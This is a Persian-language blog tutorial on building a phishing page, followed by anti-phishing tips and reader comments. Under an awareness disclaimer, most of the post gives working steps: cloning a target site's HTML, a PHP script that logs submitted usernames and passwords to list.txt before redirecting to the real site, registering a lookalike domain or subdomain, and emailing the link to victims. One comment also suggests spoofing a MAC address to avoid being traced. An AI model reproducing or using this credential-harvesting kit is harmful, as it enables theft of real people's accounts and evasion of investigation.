چگونه می‌توان صفحه جعلی یا فیشینگ ساخت؟

25
3012
صفحه جعلی یا phishing چگونه ساخته می‌شود و راه‌های محافظت در برابر آن کدامند؟

یکی از رایج‌ترین روش‌های سرقت اطلاعات به خصوص رمزعبور، حملات فیشینگ با ساخت صفحه جعلی است. خرابکاران در حملات فیشینگ صفحاتی همانند صفحه وب‌سایت هدف می‌سازند و کاربران را ترغیب به login کردن در حساب‌هایشان می‌کنند.

در این مطلب آموشی می‌خوانیم که چگونه می‌توان صفحه فیشینگ یا جعلی ساخت و از چه راه‌هایی می‌توانیم از خودمان در برابر حملات فیشینگ محافظت کنیم.

[box type=”info”]توجه داشته باشید این نوع از آموزش‌ها در وب‌سایت کنش‌تک صرفا به منظور نشان دادن راه و روش‌ و ابزارهایی است که برخی با سواستفاده از آنها، امنیت و حریم شخصی کاربران دیگر را تهدید می‌کنند. ما معتقدیم با بالا بردن آگاهی و دانش است که کاربران در صدد حفظ امنیت خود برمی‌آیند.[/box]

ساخت صفحه جعلی یا صفحه فیشینگ

برای جعل یک صفحه وب‌سایت کافی است :

  • وب‌سایت مورد نظر را در مرورگر باز کنید.
  • سپس از منوی مرورگر و یا کلیک راست روی آن صفحه، گزینه Save as را کلیک کنید.
  • مطمئن شوید که نوع فایل Html Only باشد. زیرا به فایل‌های جاوا اسکریپت و غیره نیازی نداریم. تمام عکس‌ها بصورت لینک از خود وب‌سایت اصلی خوانده می‌شوند. (این روش ساده‌ترین راه است. در نظر داشته باشید که با این روش احتمال شناسایی وب‌سایت جعلی توسط مدیران وب‌سایت اصلی امکان پذیر است.)
  • بعد از ذخیره می‌توانید فایل Html مورد نظر را روی مرورگر باز کنید. دقیقا همان صفحه را خواهید دید غیر از آنکه آدرس وب‌سایت از دستگاه شما است.
  • مطمئن شوید که نام فایل را به index تغییر داده باشید. به این ترتیب فایل شما index.html خواهد بود.
  • در ریشه یک فایل متنی (txt) اضافه کنید. این فایل برای ذخیره اطلاعات ارسال شده (نام کاربری، رمزعبور و غیره) توسط فرم ورود یا هر فرم دیگر است. مانند list.txt
  • در همان مسیر یک فایل جدید اضافه کنید. نوع این فایل php است.
  • <?php
    Header("Location: http://www.TargetDomain.com");
    
    $handle = fopen("list.txt", "a");
    
    foreach($_GET as $variable => $value) {
    
    fwrite ($handle, $variable);
    fwrite ($handle, $value);
    fwrite ($handle, "\r\n");
    }
    fwrite ($handle, "\r\n");
    
    fclose($handle);
    exit;
    ?>
    

     

  • این فایل php که همان فایل phishing است را به هر اسمی غیر از phish یا phishing ذخیره کنید. برای نمونه sample.php. 
  • نوبت فایل index.html است. آن را در ویرایشگری مانند notepad++ باز کنید. 
  • در کدهای این فایل تگ form را پیدا کنید. می‌توانید به کمک دکمه‌های میانبر Ctrl + F ابزار جستجو را باز کنید و form را پیدا کنید. 
  • در تگ form، پارامتر action را خواهید دید. Action می‌گوید که اطلاعات فرم به کدام صفحه ارسال شوند. تنها کاری که باید انجام دهید، جایگزین کردن مسیر داخل دابل کوتیشن Action با نام فایل php تان است. action=”sample.php”
  • داخل تگ فرم پارامتر method را پیدا کنید. Method می گوید که اطلاعات چگونه ارسال شوند. دو گزینه برای این پارامتر وجود دارند یکی POST و دیگری GET. در ارسال با POST اطلاعات فرم در بدنه HTTP Request فرستاده میشوند و امنیت این روش بالا است. اما در روش GET اطلاعات فرم در URL ارسال می‌شوند. مطمئن شوید که گزینه GET را برای پارامتر Method انتخاب کرده باشید. 
  • فایل‌ را ذخیره کنید.
  • در این مرحله نیاز به یک دامنه و یک هاست دارید.
  • بعد از خرید دامنه و هاست، dns‌های دامنه را به Name Server هاست تغییر دهید.
  • با استفاده از FTP، SFTP یا کنترل پنل‌های موجود، فایل‌هایتان را روی هاست‌تان آپلود کنید.

کافی است نام دامنه ثبت شده شما نزدیک به دامنه وب‌سایت هدف باشد یا از سرویس‌های کوتاه کننده لینک استفاده کنید. همچنین می‌توانید در دامنه خودتان یک Sub Damian به نام دامنه وب‌سایت هدف بسازید تا صفحه جعلی شما در آن آدرس باز شود. برای مثال وب‌سایت هدف http://www.examlpe.com  است و دامنه ثبت شما sample.com می‌باشد. می‌توانید یکSub Damian با نام ex بسازید و مسیر فایلهای آپلود شده را به آن متصل کنید. در اینصورت صفحه جعلی شما در آدرس ex.sample.com نمایش داده می‌شود. 

تمام شد. تنها کاری که باید انجام دهید ارسال لینک صفحه جعلی به ایمیل کاربران دیگر و درخواست از آنها برای ورد به حساب کاربری‌شان است. اگر کاربری اطلاعات خود را از طریق صفحه فیشینگ شما ارسال کند، آن اطلاعات در فایل list.txt ذخیره می‌شوند.

 

چگونه از حملات فیشینگ در امان بمانیم؟ 

  • هرگز تکرار می‌کنیم هرگز به ایمیل‌هایی که از شما به ترفندهای مختلف درخواست می‌کنند وارد حساب‌هایتان شوید توجه نکنید. 
  • هنگامی که می‌خواهید وارد حساب‌هایتان شوید به آدرس صفحه دقت کنید تا به اشتباه گرفتار صفحه جعلی نشوید. 
  • اگر به اشتباه اطلاعات خود را در صفحه جعلی وارد کرده اید به سرعت وارد حسابتان شوید و رمزعبور را تغییر دهید. اگر رمزعبور شما تغییر پیدا کرده است آن را ریکاوری کنید. اگر این مورد هم بی نتیجه ماند، سریعا با پشتیبانی آن سرویس تماس بگیرید و موضوع را توضیح دهید. 
  • ایمیل‌های فیشینگی که برایتان ارسال می‌شوند ممکن است دقیقا به فرمت ایمیل سرویس مورد نظر باشد. اگر لازم است وارد حسابتان شوید به جای کلیک بر روی لینک‌های ایمیل، مستقیم وارد حسابتان شوید.
  • حتما گزینه احراز هویت دو عامله حساب‌های آنلاینتان را فعال کنید.

حالا شما می‌دانید در پشت پرده حملات فیشینگ چه می‌گذرد و آنها چگونه اطلاعات کاربران را به سرقت می‌برند. از دانش و آگاهی‌تان برای بالا بردن امنیت خود و اطرافیان استفاده کنید. 

مقاله قبلیشکستن رمزعبور حساب فیسبوک با Keylogger و راههای محافظت از آن
مقاله بعدینکته‌های مهم امنیت اینترنت

25 نظر

  1. در ریشه یک فایل متنی (txt) اضافه کنید. این فایل برای ذخیره اطلاعات ارسال شده (نام کاربری، رمزعبور و غیره) توسط فرم ورود یا هر فرم دیگر است. مانند list.txt
    در همان مسیر یک فایل جدید اضافه کنید. نوع این فایل php است.

    سلام ممنونم بابت سایتون من این قسمت رو متوجه نمیشم میشه راهنمایی کنید

    • سلام
      دو فایل ایجاد می‌کنید، یکی از نوع txt و یکی php. فایل txt برای ذخیره اطلاعاتی است که کاربر به اشتباه وارد می‌کند. فایل php همان فایل فیشینگ است که در ادامه همان پاراگراف کد آن را می‌بینید.

    • سلام
      دو فایل ایجاد می‌کنید، یکی از نوع txt و یکی php. فایل txt برای ذخیره اطلاعاتی است که کاربر به اشتباه وارد می‌کند. فایل php همان فایل فیشینگ است که در ادامه همان پاراگراف کد آن را می‌بینید.

  2. سلام خسته نباشید ، چه جور هاست و دامین نیاز داریم ؟ چقدر حجم داشته باشه ؟میشه راهنمایی کنید ممنون ❤️

    • سلام
      در این آموزش فقط خواستیم نشان بدهیم که چقدر ساده می‌تواند صفحه فیشینگ ساخت. این راهنمای قدم به قدم ساخت صفحه فیشینگ و حمله فیشینگ نیست.

  3. سلام
    مفید بود
    ولی میشه ی راهنماییم بکنی ؟
    اومدیم و من fake page رو ساختم و روی یک هاست آپلود کردم و فیشینگ رو انجام دادم
    چجوری ردپای خودمو پاک کنم
    مثلا آی پی و مک آدرسی که روی هاست ذخیره میشه و …

    • سلام
      متشکریم.
      هدف این مقاله نشان دادن سادگی ساختن صفحات جعلی برای حمله فیشینگ است، نه راهنمایی حمله فیشینگ موفق.

    • سلام شما می تونید قبل از ساخت این fake page با استفاده از برنامه چینج مک ادرس مک اپیتونو تغییر داده و رد پایی جا نگزارید

  4. […] فیشینگ در دنیای اینترنت به معنی تقلب کردن معنی می‌دهد. در مورد ایمیل هنگامی که ارسال کننده کاربر را فریب می‌دهد که از طرف بانک ایمیلی را ارسال می‌کند، و یا ایمیل شامل لینکی است که کاربر را به وب‌سایت جعلی هدایت می‌کند می‌گوییم حمله فیشینگ رخ داده است. برای مثال ایمیلی دریافت می‌کنید که مدعی است از طرف بانک شماست و شامل لینکی برای ورود به حساب بانکیتان است. شما روی لینک کلیک می‌کنید و وارد وب‌سایتی کاملا شبیه وب‌سایت اصلی بانکتان می‌شوید. اگر به آدرس وب‌سایت دقت نکنید، احتمالا اطلاعات ورود به حساب بانکی‌تان را وارد می‌کنید. اتفاقی که می‌افتد این است : خرابکار اطلاعات وورد به حساب بانکی شما را ثبت می‌کند، اگر باهوش باشد بعد از اینکه شما روی دکمه ورود کلیک کردید شما را به وب‌سایت اصلی بانکتان هدایت می‌کند. […]

    • وقتی هنوز نمیدونی چرا اومدی درمورد فیشینگ بحث میکنی . اول یاد بگیر بعد ، دوما فیشینگ دزدی حساب میشه و هرگز اجنجام نده ، فقط جهت بالا بردن تواناییت در برنامه نویسی پی اچ پی و اینا

نظر بدهید

لطفا نظر خود را بنویسید
لطفا نام خود را اینجا وارد کنید

این سایت از اکیسمت برای کاهش هرزنامه استفاده می کند. بیاموزید که چگونه اطلاعات دیدگاه های شما پردازش می‌شوند.